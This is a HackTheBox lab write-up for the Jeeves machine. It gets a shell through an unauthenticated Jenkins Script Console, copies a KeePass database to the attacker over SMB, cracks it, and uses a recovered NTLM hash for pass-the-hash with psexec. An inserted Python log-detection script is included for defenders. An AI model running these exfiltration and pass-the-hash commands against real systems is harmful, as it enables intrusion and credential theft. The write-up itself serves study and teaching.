Overview
Jeeves (HackTheBox)
Operating System: Windows | Difficulty: Medium | Machine Link: Jeeves

Attack Chain

  • Initial Access: Exploited an unauthenticated Jenkins Script Console to execute arbitrary Groovy code and gain a reverse shell as the kohsuke user.
  • Privilege Escalation: Discovered a KeePass password database during local enumeration, cracked its master password, extracted the Administrator’s NTLM hash, and leveraged Pass-the-Hash to achieve full system compromise.

Machine Enumeration

Nmap

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
50000/tcp open ibm-db2 syn-ack ttl 127
$ nmap -p 50000 -sVC 10.129.228.112
PORT STATE SERVICE VERSION
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found

Web Enumeration – Port 80

Standard directory and file fuzzing (using common wordlists) yielded no meaningful results.

Web Enumeration – Port 50000

Fuzzing on port 50000 uncovered a hidden path: askjeeves. This directory hosted a Jenkins instance:

$ ffuf -c -w `fzf-wordlists` -u "http://10.129.228.112:50000/FUZZ" -mc all -fc 404 -fs 503
askjeeves [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]

Critically, the Jenkins dashboard required no authentication, exposing powerful administrative functionality to any unauthenticated user.

[Screenshot: Jenkins dashboard]

Gaining a Shell as kohsuke

Remote Code Execution via Groovy

Jenkins includes a Script Console (accessible under Manage Jenkins) that allows administrators to run Groovy scripts directly on the server.

[Screenshots: Manage Jenkins > Script Console; the Script Console textbox]

Groovy, being a JVM-based language, can execute OS commands through Java interop. Reverse shell payloads are readily available on platforms like revshells.com.

[Screenshot: Groovy reverse shell generator on revshells.com]

The default revshells.com Groovy payload assumes a Linux target (/bin/sh). Since Jeeves runs Windows, the payload must be adapted to invoke cmd.exe or powershell.exe instead.

After modifying the payload and setting up a listener, execution via the Script Console returned a stable reverse shell as the low-privileged user kohsuke.
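From the defender's side, the Script Console access described above leaves a clear trail in the Jenkins web access log. The following detection is an added example, not part of the original write-up: it assumes Jenkins' Jetty/Winstone access logging is enabled in NCSA combined format, and the log lines are constructed to mirror this box's /askjeeves context path.

```python
import re
from collections import Counter

# Constructed NCSA "combined" access-log lines modelled on the askjeeves
# path from this box; they are not real Jeeves logs.
SAMPLE_LOG = """\
10.10.14.71 - - [20/Feb/2025:18:02:11 +0000] "GET /askjeeves/ HTTP/1.1" 200 14213 "-" "Mozilla/5.0"
10.10.14.71 - - [20/Feb/2025:18:04:02 +0000] "GET /askjeeves/script HTTP/1.1" 200 6130 "http://10.129.228.112:50000/askjeeves/manage" "Mozilla/5.0"
10.10.14.71 - - [20/Feb/2025:18:04:37 +0000] "POST /askjeeves/script HTTP/1.1" 200 6412 "http://10.129.228.112:50000/askjeeves/script" "Mozilla/5.0"
10.10.14.5 - - [20/Feb/2025:18:05:01 +0000] "POST /askjeeves/scriptText HTTP/1.1" 200 17 "-" "curl/8.4.0"
10.10.14.9 - - [20/Feb/2025:18:05:30 +0000] "GET /askjeeves/job/build/1/console HTTP/1.1" 200 3012 "-" "Mozilla/5.0"
10.10.14.9 - - [20/Feb/2025:18:06:12 +0000] "POST /askjeeves/scriptText HTTP/1.1" 403 512 "-" "curl/8.4.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# /script is the web form, /scriptText the API form; both may sit under a
# context path such as /askjeeves. Other paths (e.g. /scripts/...) are ignored.
CONSOLE_RE = re.compile(r'^(?:/[^/?]+)*?/script(?:Text)?(?:\?.*)?$')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if malformed."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def detect_script_console(log_text):
    """One alert per request that reached a Script Console endpoint.
    A POST answered 200 is a script that actually ran; a GET only shows the
    form was opened. Jenkins' session login is not visible to Jetty, so the
    remote-user field is typically '-'; triage on source IP and referer."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not CONSOLE_RE.match(rec["path"]):
            continue
        rec["executed"] = rec["method"] == "POST" and rec["status"] == 200
        alerts.append(rec)
    return alerts


def executions_by_source(alerts):
    """Count successful script executions per client IP."""
    return Counter(a["ip"] for a in alerts if a["executed"])
```

Any hit on an instance where the console should be locked down is worth a ticket; on a hardened instance the same request shows up as a 403, as the last sample line does.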

[Screenshot: reverse shell received as kohsuke]

Privilege Escalation

Local Enumeration and KeePass Discovery

User enumeration began in C:\Users\kohsuke. Running tree /f /a revealed a promising file in the Documents directory: CEH.kdbx — a KeePass password database.

C:\Users\kohsuke>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 00000200 71A1:6FA1
C:.
+---.groovy
| \---grapes
+---Contacts
+---Desktop
| user.txt
|
+---Documents
| CEH.kdbx
|
...[snip]...

Exfiltrating the Database

To crack the database offline, I transferred CEH.kdbx to my attacker machine using Impacket’s smbserver.py:

$ smbserver.py share . -smb2support -username user -password password

C:\> net use \\10.10.14.71\share /user:user password
C:\> copy CEH.kdbx \\10.10.14.71\share

Cracking the Master Password

Using keepass2john, the database was converted into a hash format compatible with John the Ripper:

$ keepass2john CEH.kdbx > keepass.hashes
$ cat keepass.hashes
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
$ john --wordlist=`fzf-wordlists` keepass.hashes
moonshine1 (CEH)

The master password was cracked as moonshine1. The database was then opened in KeePassXC, revealing multiple stored credentials.

[Screenshot: CEH KeePass database entry containing the Administrator NTLM hash]

One entry held an NTLM hash. Although its purpose was not stated, I tested it directly against the machine using Pass-the-Hash with the Administrator account.

Pass-the-Hash to Administrator

Using NetExec, I validated the hash:

$ nxc smb 10.129.228.112 -u 'Administrator' -H e0fb1fb85756c24235ff238cbe81fe00
SMB 10.129.228.112 445 JEEVES [*] Windows 10 Build 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.129.228.112 445 JEEVES [+] Jeeves\Administrator:e0fb1fb85756c24235ff238cbe81fe00 (admin)

Authentication succeeded. Finally, I used Impacket’s psexec.py to spawn an elevated remote shell:

$ psexec.py -hashes :e0fb1fb85756c24235ff238cbe81fe00 Jeeves/Administrator@10.129.228.112

[Screenshot: SYSTEM shell via psexec.py Pass-the-Hash]

With this, I obtained full administrative control over the Jeeves machine.